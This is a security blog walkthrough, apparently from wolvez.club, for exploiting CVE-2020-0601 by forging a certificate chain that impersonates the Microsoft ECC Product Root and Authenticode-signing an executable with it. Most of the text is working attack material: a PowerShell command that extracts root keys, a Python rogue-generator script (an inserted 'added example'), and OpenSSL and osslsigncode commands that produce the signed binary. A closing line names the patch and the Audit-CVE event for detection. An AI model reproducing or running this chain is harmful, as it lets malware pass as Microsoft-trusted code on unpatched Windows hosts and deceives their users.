CVE-2020-0601 forged signature notes

Category: Security blog

Install dependencies

# Python side: fastecdsa (P-384 point arithmetic) and gmpy2 (modular inverse) are the libraries gen-key.py needs
pip3 install fastecdsa
pip3 install PyCryptodome
pip3 install --user gmpy2==2.1.0a2
# libmpc is a build dependency of gmpy2; osslsigncode does the Authenticode signing in the last step
apt install libmpc-dev
apt install osslsigncode

List the ECC root certificates in the system store

# List the ECC root CAs in the machine store. publickey is the subjectPublicKey bit string:
# 0x04 || X || Y, an uncompressed P-384 point (1 + 48 + 48 = 97 bytes, 194 hex characters)
dir Cert:\LocalMachine\root -Recurse | ?{ $_.FriendlyName -like "*ECC*" } | %{
    New-Object -TypeName psobject -Property @{
        SerialNumber = '0x' + $_.SerialNumber.ToLower()
        FriendlyName = $_.FriendlyName
        publickey    = [BitConverter]::ToString($_.PublicKey.EncodedKeyValue.RawData).Replace('-','').ToLower()
        publickeylen = [BitConverter]::ToString($_.PublicKey.EncodedKeyValue.RawData).Replace('-','').Length
        Subject      = $_.Subject
    }
} | Format-List
Output (publickeylen 194 = 97 bytes: the 04 prefix followed by the 48-byte X and Y coordinates of a P-384 point):

SerialNumber : 0x153875e1647ed1b047b4efaf41128245
publickeylen : 194
publickey : 04decdbb7020f12520b494e8d7b43b0f6e87ddabaccf4d402f81336b590918d6870d26239cb48d959d769fa5b90642e6ad36b2c4b3ae7a3c08d5cb9d3a5e45216c0be320f59bc2dd4433e342b9eaf2284292aafe0c07ca8a13993b6200eddaf335
FriendlyName : Microsoft ECC TS Root Certificate Authority 2018
Subject : CN=Microsoft ECC TS Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

SerialNumber : 0x14982666dc7ccd8f4053677bb999ec85
publickeylen : 194
publickey : 04c711162a761d568ebeb96265d4c3ceb4f0c330ec8f6dd76e39bcc849ababb8e34378d581065defc77d9fced6b39075de0cb090de23bac8d13e67e019a91b86311e5f342dee17fd15fb7e278a32a1eac98fc97e18cb2f3b2c487a7da6f40107ac
FriendlyName : Microsoft ECC Product Root Certificate Authority 2018
Subject : CN=Microsoft ECC Product Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

SerialNumber : 0x38623f7c7714c6aa4424574a882945ae
publickeylen : 194
publickey : 04d4ea1667c2960315edd21086c2c7904d88129154a0426d827d062f2cefd47c47469b16f3a8118a84aa11e11310a39c678bd15cde7a7bd51583ea4224be7b48585a0d9b016b35dff1756ce087c9bf305a9ea3c9c5868130bba3aadd9af1c40840
FriendlyName : Microsoft ECC Development Root Certificate Authority 2018
Subject : CN=Microsoft ECC Development Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

Edit openssl.cnf

[ req ]
prompt = no
distinguished_name = req_distinguished_name
x509_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = Washington
L = Redmond
O = Microsoft Corporation
CN = Microsoft ECC Product Root Certificate Authority 2018
[v3_req]
subjectAltName = @alt_names
[alt_names]
DNS.1 = *.microsoft.com

The [ req ] section supplies the subject for both certificates: the rogue CA (the `openssl req -x509` command below runs without -config, so it picks this file up only if it is the default openssl.cnf or OPENSSL_CONF points at it) and the leaf CSR, which passes -config explicitly. The v3_req section adds only a wildcard subjectAltName; no keyUsage or extendedKeyUsage is set.
# A genuine P-384 key. -param_enc explicit is the point of the attack: the key file then carries its own
# curve parameters (prime, a, b, generator, order) instead of the secp384r1 OID, so the generator can be replaced
openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit

Edit gen-key.py: paste in the publickey of the root being impersonated with the leading 04 removed (04 is only the uncompressed-point marker; what remains is the 48-byte X coordinate followed by the 48-byte Y coordinate).

# Takes the explicit-parameter key generated above, swaps in a rogue generator G' and the chosen private key d',
# and writes p384-key-rogue.pem, whose public key equals the Microsoft root's
python3 gen-key.py
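What gen-key.py computes, as an added example written for this page (it is not the script from the linked repository and does not write the PEM file): the real root's public key is Q = d*G for an unknown d, so the attacker picks any private key d' and declares G' = (d'^-1 mod n) * Q to be the curve's generator; then d' * G' = Q, and a key file carrying explicit parameters with generator G' and private key d' has exactly the cached root's public key. The code implements P-384 arithmetic itself (pure Python 3.8+, no fastecdsa or gmpy2). The Microsoft key string in the `__main__` block is the one listed by the PowerShell command above; the private key 0x20200601 is an arbitrary choice, and `forge_explicit_params` is a name invented here.

```python
"""Rogue-generator arithmetic behind CVE-2020-0601 (added example, not the page's gen-key.py)."""

# NIST P-384 domain parameters (standard values), assembled from 32-bit words to avoid miscounted digits.
P = int("ffffffff" * 7 + "fffffffe" + "ffffffff" + "00000000" * 2 + "ffffffff", 16)
A = P - 3
B = 0xb3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aef
N = int("ffffffff" * 6 + "c7634d81f4372ddf581a0db248b0a77aecec196accc52973", 16)
G = (0xaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7,
     0x3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5f)
COORD_BYTES = 48  # one P-384 coordinate


def on_curve(pt):
    """True for the point at infinity (None) or any (x, y) with y^2 = x^3 + a*x + b (mod p)."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def add(p1, p2):
    """Affine group law on the curve; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:  # P + (-P) = infinity
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P  # tangent slope (doubling)
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P  # chord slope
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def mul(k, pt):
    """Double-and-add scalar multiplication (not constant-time; only the attacker's own values are used)."""
    result, addend = None, pt
    while k > 0:
        if k & 1:
            result = add(result, addend)
        addend = add(addend, addend)
        k >>= 1
    return result


def parse_uncompressed(hex_key):
    """Parse the 04 || X || Y hex string from the certificate store (the 'strip the leading 04' step)."""
    raw = bytes.fromhex(hex_key)
    if len(raw) != 1 + 2 * COORD_BYTES or raw[0] != 0x04:
        raise ValueError("expected an uncompressed P-384 point: 97 bytes starting with 04")
    pt = (int.from_bytes(raw[1:1 + COORD_BYTES], "big"), int.from_bytes(raw[1 + COORD_BYTES:], "big"))
    if not on_curve(pt):
        raise ValueError("point is not on P-384")
    return pt


def encode_uncompressed(pt):
    """Inverse of parse_uncompressed: 04 || X || Y as lowercase hex."""
    x, y = pt
    return "04" + x.to_bytes(COORD_BYTES, "big").hex() + y.to_bytes(COORD_BYTES, "big").hex()


def rogue_generator(q, d):
    """G' = d^-1 * Q, so that d * G' == Q for the attacker-chosen private key d."""
    if not 1 <= d < N:
        raise ValueError("private key must be in [1, n-1]")
    return mul(pow(d, -1, N), q)


def forge_explicit_params(pubkey_hex, d):
    """All values a rogue key file with explicit ECParameters must carry for the target public key."""
    q = parse_uncompressed(pubkey_hex)
    g_rogue = rogue_generator(q, d)
    if mul(d, g_rogue) != q:
        raise RuntimeError("d * G' did not reproduce the target public key")
    return {"p": P, "a": A, "b": B, "n": N, "generator": encode_uncompressed(g_rogue),
            "private_key": d, "public_key": encode_uncompressed(q)}


if __name__ == "__main__":
    # publickey of "Microsoft ECC Product Root Certificate Authority 2018" as listed above; d is arbitrary
    MS_ECC_PRODUCT_ROOT_2018 = "04c711162a761d568ebeb96265d4c3ceb4f0c330ec8f6dd76e39bcc849ababb8e34378d581065defc77d9fced6b39075de0cb090de23bac8d13e67e019a91b86311e5f342dee17fd15fb7e278a32a1eac98fc97e18cb2f3b2c487a7da6f40107ac"
    for name, value in forge_explicit_params(MS_ECC_PRODUCT_ROOT_2018, d=0x20200601).items():
        print(f"{name}: {value:x}" if isinstance(value, int) else f"{name}: {value}")
```

To turn these values into a key file you still need gen-key.py or any tool that writes an ECPrivateKey with explicit ECParameters. The check that the file came out right is `openssl ec -in p384-key-rogue.pem -text -noout`: the Generator (uncompressed) line must equal the generator printed here and the pub line must equal the Microsoft root's public key.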

Fill in the SerialNumber of the root being impersonated (here Microsoft ECC Product Root Certificate Authority 2018)

# Self-signed rogue CA: carries the Microsoft root's public key (from the rogue key) and its serial number
openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x14982666dc7ccd8f4053677bb999ec85
# Leaf certificate on an ordinary named curve, issued by the rogue CA with the explicit-parameter key
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf

Build a PKCS#12 bundle and sign a file

# Bundle the leaf key, leaf certificate and rogue CA, then Authenticode-sign a binary with it
openssl pkcs12 -export -in client-cert.pem -inkey prime256v1-privkey.pem -certfile ca-rogue.pem -out cert.p12
osslsigncode sign -pkcs12 cert.p12 -n "Signed by wawa" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe

The signature only verifies on a Windows host that has not received the January 2020 update for CVE-2020-0601. Patched hosts reject the chain and write an event with source Audit-CVE (Microsoft-Windows-Audit-CVE, Event ID 1) to the Application log, which is the thing to hunt for when testing this.

Result

[Screenshot: CVE-2020-0601 forged signature]

Thanks to zcgonvh & scanf for the idea.

Links: gen-key, CVE-2020-0601

Source: wolvez.club | Author: wolvez
